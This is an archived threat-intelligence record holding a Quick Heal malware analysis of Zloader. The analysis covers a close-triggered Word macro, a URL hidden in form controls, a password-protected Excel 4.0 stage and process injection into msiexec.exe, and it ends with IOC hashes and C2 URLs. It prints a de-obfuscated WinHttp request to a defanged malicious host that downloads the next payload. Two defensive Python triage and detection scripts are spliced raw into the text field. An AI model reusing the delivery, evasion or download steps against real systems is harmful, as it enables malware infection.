{
	"id": "f1e6ce77-c865-4195-add8-5491be744ad9",
	"created_at": "2026-04-06T00:08:31.840229Z",
	"updated_at": "2026-04-10T03:20:05.978338Z",
	"deleted_at": null,
	"sha1_hash": "fca84e00271efd3a1d895bbca19d86701c3904ac",
	"title": "Zloader: Entailing Different Office Files - Home",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2543415,
	"plain_text": "Zloader: Entailing Different Office Files - Home\r\nBy Anjali Raut\r\nPublished: 2021-03-23 · Archived: 2026-04-02 10:48:10 UTC\r\nZloader (aka Terdot), a variant of the infamous Zeus banking malware, is well known for aggressively using “.xls” and “.xlsx” documents as the initial vector for delivering its payload. Recently, however, we came across a “.docm” file being used by the Zloader family for its initial activity. This shows that adversaries like to experiment with Office document formats to avoid detection by security solutions.\r\nFig.1- Attack Chain\r\nInitial Vector:\r\nHere the infection chain starts with a “.docm” file. Docm stands for “macro-enabled Word document”. As seen below, the document asks the user to enable content.\r\nFig.2- Document View\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 1 of 8\r\nLike many other documents, we tried to observe its activity after enabling content, but there was no activity at all. Looking at its VBA code gave us the answer: enabling content does not execute the macro. Here macro execution starts on “Document close”, as shown. Triggering on close rather than on open also means that a sandbox which opens the document and simply waits sees nothing unless it closes the document as well.\r\nFig.3- Macro Function Call\r\nAs soon as the victim closes this document, the function “nnn” is called, which is the main function of this VBA macro. In it, further sub-functions are called. Here the adversaries also make use of a “UserForm” to perform the next-stage activity.\r\nFig.4- Sub Function Call\r\nThe UserForm_Initialize() function is used to invoke “Userform2”. The image below shows the Userform2 object. 
In its dialog box, the URL data is chunked and spread across the ComboBox controls, overlapped on the 25th ComboBox to hide the actual data, as shown below.\r\nFig.5- Hidden URL Data\r\nAfter going through all the ComboBoxes of Userform2, we were able to locate the malicious URL used to download the 2nd-stage payload.\r\nFig.6- Chunked URL Data\r\nTo sum up the above activity, the adversaries use a for loop to read all these values and build the final URL, as shown below.\r\nFig.7- Creation of URL on Document Close\r\nThe site “hxxps[:]//feelingfit-always[.]com/1[.]php”, which is malicious with a VirusTotal score of 11, is used to download a password-protected XLS file. Its password is again hidden in the VBA macro, this time in “Userform1”. By exploring the Userform1 data, we were able to extract the hidden password.\r\nFig.8- Macro Code to protect XLS with password\r\nFig.9- XLS Hidden Password\r\n2nd Stage Payload:\r\nProtecting a document with a password is a classic technique to defeat AV scanning, since the correct password is necessary to dig any further into the analysis. After supplying the above password, we can finally see the Excel workbook content. An XLM (Excel 4.0) macro in “Sheet3” performs the further activity.\r\nFig.10- XLS Workbook\r\nHere the code is embedded across different cells of the document. The figure below shows the macro code extracted from the above workbook:\r\nFig.11- XLM Macro Code\r\nHere the adversaries make use of Excel built-in functions like IIF and Switch to obfuscate the data.
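Before moving on to the XLM stage, here is a small triage script for the DOCM stage described above. It is an added example, not code from the Quick Heal post or from the malware: it flags auto-execute procedures such as Document_Close (the trigger this sample uses instead of Document_Open), lists suspicious API names, and mirrors the macro's for loop that rebuilds a URL from sequentially named form controls. SAMPLE_VBA and SAMPLE_CONTROLS are constructed stand-ins for what the figures show; the placeholder URL example.invalid is not the real download site, and the control dump is the kind of output an analyst would get from a VBA project parser such as oletools.

```python
# Added example (not code from the Quick Heal post or from the malware):
# triage helpers for the DOCM stage. SAMPLE_VBA and SAMPLE_CONTROLS are
# constructed stand-ins for what the post's figures show; the real macro
# body and the real download URL are not reproduced here.

AUTOEXEC_TRIGGERS = (
    'document_open', 'document_close', 'autoopen', 'autoclose', 'autoexec',
    'autoexit', 'autonew', 'workbook_open', 'workbook_close', 'userform_initialize',
)
SUSPICIOUS_KEYWORDS = (
    'winhttp', 'msxml2.xmlhttp', 'urldownloadtofile', 'createobject',
    'adodb.stream', 'savetofile', 'wscript.shell', 'shell(',
)

# Constructed VBA in the shape the post describes: nothing on open, the main
# routine nnn runs on close, and the URL is assembled from UserForm2 controls.
SAMPLE_VBA = '''
Private Sub Document_Close()
    nnn
End Sub

Sub nnn()
    Load UserForm2
End Sub

Private Sub UserForm_Initialize()
    Dim i As Integer
    For i = 1 To 25
        url = url & UserForm2.Controls(i - 1).List(0)
    Next i
    ' the request object (WinHttp.WinHttpRequest.5.1) is also built from form data
    Set req = CreateObject(clsid)
    req.Open verb, url, False
    req.Send
End Sub
'''


def find_triggers(vba_source):
    '''Names of auto-execute procedures declared in the VBA source, in order.'''
    found = []
    for line in vba_source.lower().splitlines():
        line = line.strip()
        if not line.startswith(('sub ', 'private sub ', 'public sub ')):
            continue
        for trig in AUTOEXEC_TRIGGERS:
            if trig in line and trig not in found:
                found.append(trig)
    return found


def find_keywords(vba_source):
    '''Suspicious API and object names present anywhere in the source.'''
    low = vba_source.lower()
    return [kw for kw in SUSPICIOUS_KEYWORDS if kw in low]


def reassemble_chunks(controls, prefix):
    '''Mirror the macro's For loop: join the values of prefix1, prefix2, ...
    until the next sequential control is missing. Controls with other names
    (decoys, the password form) are ignored.'''
    parts = []
    i = 1
    while f'{prefix}{i}' in controls:
        parts.append(controls[f'{prefix}{i}'])
        i += 1
    return ''.join(parts)


URL = 'https://example.invalid/1.php'  # constructed placeholder, not the real site
# 4-character fragments in ComboBox1..ComboBox8, plus an unrelated decoy control
SAMPLE_CONTROLS = {f'ComboBox{n + 1}': URL[n * 4:(n + 1) * 4] for n in range(8)}
SAMPLE_CONTROLS['TextBox1'] = 'decoy text'


def triage(vba_source, controls, chunk_prefix='ComboBox'):
    '''Summarise what an analyst wants to know before detonating the file.'''
    triggers = find_triggers(vba_source)
    close_only = 'document_close' in triggers and not any(
        t in triggers for t in ('document_open', 'autoopen'))
    return {
        'triggers': triggers,
        'runs_on_close_only': close_only,
        'keywords': find_keywords(vba_source),
        'hidden_url': reassemble_chunks(controls, chunk_prefix),
    }


if __name__ == '__main__':
    print(triage(SAMPLE_VBA, SAMPLE_CONTROLS))
```

The runs_on_close_only flag is the operational point: a sample like this must be closed, not just opened, for dynamic analysis to see the download, so a detonation that only opens and waits will report a clean file.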
The final de-obfuscated code can be seen below:\r\nWinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False\r\nWinHttp.WinHttpRequest.5.1.SetRequestHeader\r\nWinHttp.WinHttpRequest.5.1.send\r\nThe above malicious URL, with a VirusTotal score of 8, is used to download the 3rd-stage payload of this attack.\r\nFinal Payload Analysis:\r\nThe DLL is the final payload of Zloader. The DLL is highly obfuscated and avoids direct calls to the Windows APIs: hashing is used to calculate the API addresses and the calls are made with the calculated values, which makes reversing difficult. Resolving APIs by hash also keeps the API names out of the import table and out of a strings dump, so import-based static detection has little to work with.\r\nFig.12- Code for address calculation\r\nThe DLL creates the process ‘msiexec.exe’, a genuine Microsoft process belonging to Windows Installer, in suspended mode and injects an encrypted file into it.\r\nFig.13- ‘msiexec.exe’ created in suspended mode\r\nFig.14- Encrypted file injected in ‘msiexec.exe’\r\nIt also injects a routine that decrypts the malicious PE and brings it out for execution.\r\nFig.15- Decryption Routine\r\nBy setting the thread context, the initial execution point is passed, and finally the injected code is executed by resuming the thread. Because the msiexec.exe image on disk stays legitimate, detection has to rely on the parent process, the injected memory regions and the network traffic rather than on the file itself.\r\nWhen this thread of msiexec.exe starts executing, it tries to connect to its CnC servers, as shown.\r\nSince these URLs were down at the time of analysis, we were not able to go any deeper.\r\nConclusion:\r\nThis type of attack shows how adversaries innovate their mechanisms for starting an infection chain to compromise victims. Users should always be cautious while opening any Office files.
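The final-stage behaviour above (a DLL starting msiexec.exe suspended, injecting into it, then beaconing to the post.php URLs in the IOC list) can be turned into a small correlation rule set. The following is an added example, not code from the Quick Heal post: it runs three rules over constructed event records modelled on Sysmon event IDs 1 (process create), 8 (CreateRemoteThread) and 3 (network connect). The PIDs, the choice of rundll32.exe as the host process for the DLL and the baseline of expected msiexec.exe parents are assumptions for the example; the hostnames are the ones from the post's IOC list.

```python
# Added example (not code from the Quick Heal post): correlation rules for
# the final-stage behaviour described above, run over constructed event
# records modelled on Sysmon event IDs 1 (process create), 8 (CreateRemoteThread)
# and 3 (network connect). PIDs, the rundll32.exe host for the DLL and the
# set of expected msiexec.exe parents are assumptions; the hostnames are the
# ones in the post's IOC list.

IOC_HOSTS = {
    'tiodeitidampheater.tk', 'actes-etatcivil.com', 'ankarakreatif.com',
    'www.ramazanyildiz.net', 'hispaniaeng.com', 'www.ifdd.francophonie.org',
}
# Parents from which msiexec.exe is normally started (assumed baseline).
EXPECTED_MSIEXEC_PARENTS = {'services.exe', 'msiexec.exe', 'svchost.exe', 'explorer.exe'}
OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}

SAMPLE_EVENTS = [  # constructed; field names are simplified Sysmon fields
    {'id': 1, 'pid': 100, 'image': 'excel.exe', 'parent': 'explorer.exe', 'ppid': 1},
    {'id': 1, 'pid': 200, 'image': 'rundll32.exe', 'parent': 'excel.exe', 'ppid': 100},
    {'id': 1, 'pid': 300, 'image': 'msiexec.exe', 'parent': 'rundll32.exe', 'ppid': 200},
    {'id': 8, 'spid': 200, 'source': 'rundll32.exe', 'tpid': 300, 'target': 'msiexec.exe'},
    {'id': 3, 'pid': 300, 'image': 'msiexec.exe', 'dest': 'actes-etatcivil.com', 'dport': 443},
    # benign control: a real installation started by the service control manager
    {'id': 1, 'pid': 400, 'image': 'msiexec.exe', 'parent': 'services.exe', 'ppid': 2},
    {'id': 3, 'pid': 400, 'image': 'msiexec.exe', 'dest': 'download.microsoft.com', 'dport': 443},
]


def office_ancestor(procs, pid, max_hops=3):
    '''True if an Office application is within max_hops parents of pid.'''
    proc = procs.get(pid)
    for _ in range(max_hops):
        if proc is None:
            return False
        if proc['image'] in OFFICE_APPS:
            return True
        proc = procs.get(proc['ppid'])
    return False


def correlate(events):
    '''Return {pid: sorted rule names} for every process that tripped a rule.'''
    alerts = {}

    def fire(pid, rule):
        alerts.setdefault(pid, set()).add(rule)

    procs = {e['pid']: e for e in events if e['id'] == 1}
    for e in events:
        if e['id'] == 1 and e['image'] == 'msiexec.exe':
            if e['parent'] not in EXPECTED_MSIEXEC_PARENTS:
                fire(e['pid'], 'msiexec_unusual_parent')
            if office_ancestor(procs, e['ppid']):
                fire(e['pid'], 'msiexec_office_ancestry')
        elif e['id'] == 8 and e['target'] == 'msiexec.exe':
            # Sysmon 8 only covers CreateRemoteThread; the suspended-process
            # SetThreadContext/ResumeThread path in the post may need EDR
            # telemetry instead, so this rule is a supplement, not the anchor.
            fire(e['tpid'], 'remote_thread_into_msiexec')
        elif e['id'] == 3:
            if e['dest'] in IOC_HOSTS:
                fire(e['pid'], 'known_c2_host')
            elif e['pid'] in alerts:
                fire(e['pid'], 'flagged_process_beacons')
    return {pid: sorted(rules) for pid, rules in alerts.items()}


if __name__ == '__main__':
    for pid, rules in correlate(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The ancestry and parent rules carry the weight here because they do not depend on the C2 hostnames, which rotate; the IOC match is the cheap confirmation. Note that the benign msiexec.exe launched by services.exe trips nothing even though it also talks to the network, which is the false-positive case any msiexec rule has to survive.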
Quick Heal and Seqrite enterprise security solutions protect their customers from such files. So remember to keep your endpoint security solutions updated at all times.\r\nIOCs:\r\nDOCM: 117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d\r\n409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1\r\n91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4\r\nXLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89\r\nURL:\r\nhttps[://]tiodeitidampheater.tk/post.php\r\nhttps[://]actes-etatcivil.com/post.php\r\nhttps[://]ankarakreatif.com/post.php\r\nhttps[://]www.ramazanyildiz.net/post.php\r\nhttps[://]hispaniaeng.com/post.php\r\nhttps[://]www.ifdd.francophonie.org/post.php\r\nSubject Matter Experts:\r\nAnjali Raut\r\nPriyanka Shinde\r\nSource: https://blogs.quickheal.com/zloader-entailing-different-office-files/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.quickheal.com/zloader-entailing-different-office-files/"
	],
	"report_names": [
		"zloader-entailing-different-office-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434111,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.pdf",
		"text": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.txt",
		"img": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.jpg"
	}
}